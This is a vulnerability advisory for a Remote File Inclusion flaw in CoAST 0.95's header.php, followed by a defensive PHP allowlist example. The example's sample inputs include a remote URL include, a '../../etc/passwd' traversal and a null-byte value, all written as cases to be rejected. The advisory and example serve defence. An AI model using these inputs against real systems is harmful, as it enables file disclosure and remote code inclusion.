Vendor: The Concord Asset, Software, and Ticket system (CoAST)
By: DaRkLiFe
CVSS: 7.5 (HIGH)
Vulnerability: Remote File Inclusion
CWE: 98
Product Name: The Concord Asset, Software, and Ticket system(CoAST)
Affected Version From: 0.95
Affected Version To: 0.95
Patch Exists: YES
Related CWE: N/A
CPE: coast-0.95.tgz
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability
The distribution ships a header.php.dist file, which the installation instructions say to rename to header.php. The vulnerability is at line 201 of header.php, which includes the file named by the $sections_file variable without any sanitization.
Mitigation:
Sanitize user input and validate the data before using it in the application.
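
One way to apply this mitigation to an include like the one described at line 201, shown as an added example that is not CoAST's own code: the requested value is resolved through a fixed allowlist and never used as a path. The function name, section names, file names and directory are hypothetical.

```php
<?php
// Added example, not CoAST source. All names below (function, section keys,
// file names, directory) are hypothetical placeholders.

/**
 * Map a requested section name to a file shipped with the application.
 * The request value is only ever used as an array key, never as a path,
 * so URLs, "../" sequences and null bytes cannot reach include().
 */
function resolve_sections_file($requested, array $allowed, $baseDir)
{
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        return null;                       // unknown name: refuse
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    // realpath() returns false for missing files and resolves symlinks;
    // the prefix check keeps the result inside the base directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Pattern the advisory describes (do not use): include($sections_file);

$allowed = array(                          // hypothetical section files
    'default' => 'sections.php',
    'admin'   => 'sections_admin.php',
);

// Constructed fixture so the example runs stand-alone.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'coast_example_sections';
@mkdir($dir);
foreach ($allowed as $f) { touch($dir . DIRECTORY_SEPARATOR . $f); }

// Constructed inputs: two valid names, then values that must be refused.
$samples = array('default', 'admin', 'http://example.invalid/x.txt?',
                 '../../etc/passwd', "default\0.php", array('default'));

foreach ($samples as $s) {
    $file = resolve_sections_file($s, $allowed, $dir);
    printf("%-36s => %s\n", json_encode($s), $file === null ? 'rejected' : $file);
    // In the application: if ($file !== null) { include $file; } else fail closed.
}
```

Setting `allow_url_include = Off` in php.ini (the default since PHP 5.2) additionally stops `include` from fetching remote URLs, but it does not address local paths, so the allowlist is still needed.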